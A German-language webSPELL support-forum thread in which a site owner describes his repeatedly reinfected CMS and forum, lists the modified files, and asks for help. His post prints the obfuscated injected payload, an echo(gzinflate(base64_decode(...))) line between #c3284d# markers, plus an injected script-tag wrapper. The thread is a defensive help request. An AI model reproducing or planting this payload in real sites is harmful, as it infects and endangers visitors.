• » webSPELL.org - Free Content Management System
  • Language switch: English German
  • login



    » lost password?   » register now
  • About webSPELL

    webSPELL is a free Content Management System which was especially developed for the needs of esport related communities. Since a short while we are also offering an optimized and enhanced webSPELL version for the special requirements of non-profit organisations. The purpose of both systems is to offer a professional and free opportunity to create and administrate your own website in an easy and optimized way.

    » Learn more about webSPELL     » Download webSPELL now!
  • Advertisement

    Follow us

  • Sort:     printview


    To start or to reply to a topic you have to be registered and logged in!

    register now
    login
    Author
    Message
    webSPELL lover
    1003 Posts
    18.07.2012, 23:58 email offline quote 

    Es könnte mehre Ursachen haben.
    Entweder hat der Webspace eine Sicherheitslücke oder deine Webseite.
    Wenn man diese nach belieben ausnutzen kann kommt man immer anndie aktuelken Zugangsdaten.

    Interessant wäre es die ip zu loggen vom Angreifer. Eventuell auch die Anfragen selbst damit könnte man auch die Schwachstelle ausmachen.
    Da sollte aber dein Hoster der richtige Ansprechpartner sein.

    Wesbepell Addon Erstellung und Anpassungen (x)HTML Valide div/css
    Bei interesse PM mit ausführlicher Beschreibung und Preisvorstellung.
    webSPELL newbie
    31 Posts
    18.07.2012, 21:31 offline quote 

    cool, danke.
    hab ich alles schon gemacht. ich würd mal salop behaupten, das die nicht mein problem ist.
    wer sucht der findet auch etwas nur komisch ist, obwohl ich alle passwörter ändern, hab ich nach ne kurzen zeit die gelöschten zeilen wieder dort wo sie vorher waren.
    das zeigt mir das es irgendwo nen türchen offen ist. oder lieg ich da falsch?

    anders gefragt: wie kann man solche code zeilen denn als hacker etc. in die daten andere hinzufügen?
    per ftp zugang oder andere methoden?
    bei ftp müsste es doch so sein, sobald ich alles lösche, daten änder und alles neubeziehe dürfte der zugang doch gekappt sein?
    webSPELL lover
    1201 Posts
    18.07.2012, 18:41 offline quote 

    Vielleicht hilft dir das hier weiter.
    webSPELL newbie
    31 Posts
    18.07.2012, 18:16 offline quote 

    danke für die schnelle antwort!

    naya... so viel mehr hilft mir die seite auch nicht!

    von irgendwo hat der hacker oder wer auch immer nen zugang zu der seite!
    hab mehrmals alels erneuert.... passwörter x male geändert(sei es forum, page, ftp etc.),
    aber irgendwie kommt da trotzdem was druch :/
    Administrator
    Member of webSPELL e.V.
    1454 Posts
    18.07.2012, 17:54 offline quote 


    perl -e 'print $i=pack(c5,(41*2),sqrt(7056),(unpack(c,H)-2),oct(115),10);'
    webSPELL newbie
    31 Posts
    18.07.2012, 17:43 offline quote 

    servus
    Seit einigen Wochen habe ich nun Kopfzerbrechen und finde nirgends wirklich Hilfe!
    Da wir nun Jahre lang auf Webspell setzten und hier auch Qualifizierte Leute anwesend sind wollte ich es auch mal hier versuchen.

    Das Problem ist folgender:
    Seit vielen Wochen schlagen die Antivir Programmer vieler thedaemon.de Besucher Alarm.
    Hab mehrmals Schadhafte Scriptteile gefunden(interessant wie die dahin gelangen) sie auch gelöscht.
    Vor ca. 1-2 Wochen wurd dann zum ersten mal die Domain von Google und von der Technik Abteilung unseren Webspace host geschlossen. Hab wie schon oft in Foren gelesen:
    einen Datenbank Backup gemacht. Alles vom Space gelöscht und die neueste Version installiert!(unten mehr dazu)
    Es lief wieder aber bis zum 16.07.12 hielt das Ganze leider nur!

    Zwar schlägt Google folgendes vor: http://www.stopbadware.org/home/security damit aber kann ich nichts anfangen
    Was würdet ihr an meiner stelle machen?

    Die Scripte die auf dem Server laufen:
    Webspell 4.2.3a (thedaemon.de/page)
    Burning Board Lite 2.0.1 (thedaemon.de/forum)
    (Die FTP Daten wurden auch geändert!)


    Was mir aufgefallen ist:
    auf dem Server werden folgende Datein geändert:

    Webspell:
    index.php
    checklogin.php
    admin/index.php
    templates/clanwar_edit.html
    templates/clanwar_new.html


    BurningBoardLite:
    index.php
    acp/index.php
    wcf\templates\compiled\27_0_2_board.php
    wcf\templates\compiled\27_0_2_index.php
    wcf\templates\compiled\27_0_2_postAdd.php
    wcf\templates\compiled\27_0_2_postEdit.php
    wcf\templates\compiled\27_0_2_thread.php
    wcf\templates\compiled\27_0_2_threadAdd.php
    wcf\templates\compiled\27_0_3_index.php

    Ich kann unmöglich alle Dateien manuel danach absuchen amüsiert

    Die Enterpage(index.html),da soll auch was drauf sein.
    Beim runterladen ist er kurz auf dem Desktop, aber nach spätestens 30-60 sekunden popt von Windows7 Essentiells eine grüne Meldung und die Datei verschwindet. Die Datei lässt sich auch nicht öffnen!

    So sieht der Teil aus:
    Code:
    1.
    2.
    3.
    #c3284d#
    echo(gzinflate(base64_decode("VVHBboMwDL1X6j/kZtA6GKgMdaOVummHnfYB6xQFYkokmqSJS+nfD1hXbb7ZfvZ7fi585ZSlzXzWCcf4ka2ZNNXpgJqiyqEgfGtxzAJQtRMHhHAxn7EhuB6w4JG2RE6VJ0J4ns/48ZPrrwC8q2DBoCGyT3HcoHBkamtajDRS3B/ayDYWwmki8nQZGtZ4RcpMa0XpTXtbeQWclaRm7CaPtv9LNgkrjZPoBlItOrUXZFx08ui2+/EUpSX2H3UA8kHkIlmmZZ5lSZ5Kkad1nS9FIqo0S1YrCNkdS/7parGmkfU+y1b5D/HNorNThAEUUnVMyfUOOJdOyG4HmyIeipvpxBt8j3S18+XyLoNfNISRsBa1fG1UKwN+HIeK+Pqabw==")));
    #c3284d#


    Code:
    1.
    2.
    !--c3284d--><script>                                    
    </script><!--/c3284d-->


    EDIT// 17:50Uhr 18.07.12
    The following are example URLs from your site where we found such content:

    http://www.thedaemon.d...e1efd5d836a9cf93cc7ffd875
    http://www.thedaemon.d...e1efd5d836a9cf93cc7ffd875

    Wenn ich das lösche hab ich paar Minuten Ruhe und dann steht es wieder da wo es vorher stand unglücklich

    Kurz ich bin am verzeifeln. Weiß nicht mehr weiter!
    Hoffe ihr könnt uns da weiter helfen!
    LG Burak B. / Radonaktiv
    Sort:     printview


    To start or to reply to a topic you have to be registered and logged in!

    register now
    login
  • » Support

    » Topics
    20.05.2013 - 21:11 - 12 Replies
    » High Quality Website
    High Quality Website
    Last post: Dansjostedt
    Board: EN - Offers
    20.05.2013 - 21:11
    20.05.2013 - 20:41 - 6 Replies
    » login startseite
    login startseite
    Last post: Swordfish3000
    Board: DE - Technischer Support
    20.05.2013 - 20:41
    20.05.2013 - 18:27 - 4 Replies
    » [S] Tester für neuen Foru...
    [S] Tester für neuen ForumMod
    Last post: Argu
    Board: DE - Anfragen
    20.05.2013 - 18:27
    20.05.2013 - 11:47 - 5 Replies
    » Suche Designer GGL:Geld
    Suche Designer GGL:Geld
    Last post: Dynamic-Webmedia
    Board: DE - Suche
    20.05.2013 - 11:47
    20.05.2013 - 04:06 - 3 Replies
    » forum anzeige erweitern
    forum anzeige erweitern
    Last post: Swordfish3000
    Board: DE - Allgemeiner Support
    20.05.2013 - 04:06
    20.05.2013 - 00:07 - 0 Replies
    » [S] Suche Programmierer
    [S] Suche Programmierer
    Last post: phoenix762
    Board: DE - Suche
    20.05.2013 - 00:07
    19.05.2013 - 03:55 - 8 Replies
    » Mein Forum
    Mein Forum
    Last post: Lordy4007
    Board: DE - Fragen zur Seite
    19.05.2013 - 03:55
    18.05.2013 - 19:58 - 36 Replies
    » Exklusiv Webseite zur Mie...
    Exklusiv Webseite zur Miete
    Last post: liQweb
    Board: DE - Biete
    18.05.2013 - 19:58
    18.05.2013 - 12:21 - 1 Replies
    » Query failed
    Query failed
    Last post: LoRd
    Board: DE - Allgemeiner Support
    18.05.2013 - 12:21
    18.05.2013 - 09:36 - 3 Replies
    » benötige hilfe bei paar k...
    benötige hilfe bei paar kleinigkeiten
    Last post: immostar
    Board: DE - Technischer Support
    18.05.2013 - 09:36
    18.05.2013 - 03:33 - 4 Replies
    » [SELL] Gaming Website
    [SELL] Gaming Website
    Last post: hornyst
    Board: EN - Offers
    18.05.2013 - 03:33
    18.05.2013 - 00:32 - 6 Replies
    » Hide BBCODE Echo
    Hide BBCODE Echo
    Last post: dado2106
    Board: EN - Technical support
    18.05.2013 - 00:32
    17.05.2013 - 21:42 - 0 Replies
    » website help
    website help
    Last post: envy0024
    Board: EN - Technical support
    17.05.2013 - 21:42
    17.05.2013 - 21:03 - 1 Replies
    » Need Coder!
    Need Coder!
    Last post: iG.ShAdOw
    Board: EN - Requests
    17.05.2013 - 21:03
    17.05.2013 - 20:44 - 9 Replies
    » Query failed!
    Query failed!
    Last post: LoRd
    Board: DE - Allgemeiner Support
    17.05.2013 - 20:44
    17.05.2013 - 18:08 - 0 Replies
    » [4 SALE] Layouts (Gaming,...
    [4 SALE] Layouts (Gaming, Portfolio and more)
    Last post: Freestyler92
    Board: EN - Offers
    17.05.2013 - 18:08
    17.05.2013 - 18:06 - 0 Replies
    » Design Ausverkauf - alles...
    Design Ausverkauf - alles unter 70€
    Last post: Freestyler92
    Board: DE - Biete
    17.05.2013 - 18:06
    17.05.2013 - 10:56 - 6 Replies
    » [Biete] Template Designs
    [Biete] Template Designs
    Last post: Marceld
    Board: DE - Biete
    17.05.2013 - 10:56
    17.05.2013 - 10:41 - 7 Replies
    » register captcha
    register captcha
    Last post: nappel.ger
    Board: DE - Allgemeiner Support
    17.05.2013 - 10:41
    17.05.2013 - 00:13 - 0 Replies
    » News
    News
    Last post: dado2106
    Board: EN - Modifications
    17.05.2013 - 00:13
    » Partners
    Bilderkiste.org Image Hosting
    k3rmit.org
    PascalMh.de


    » Blog
    28.03.2013 - derchris
    » Those damn spammers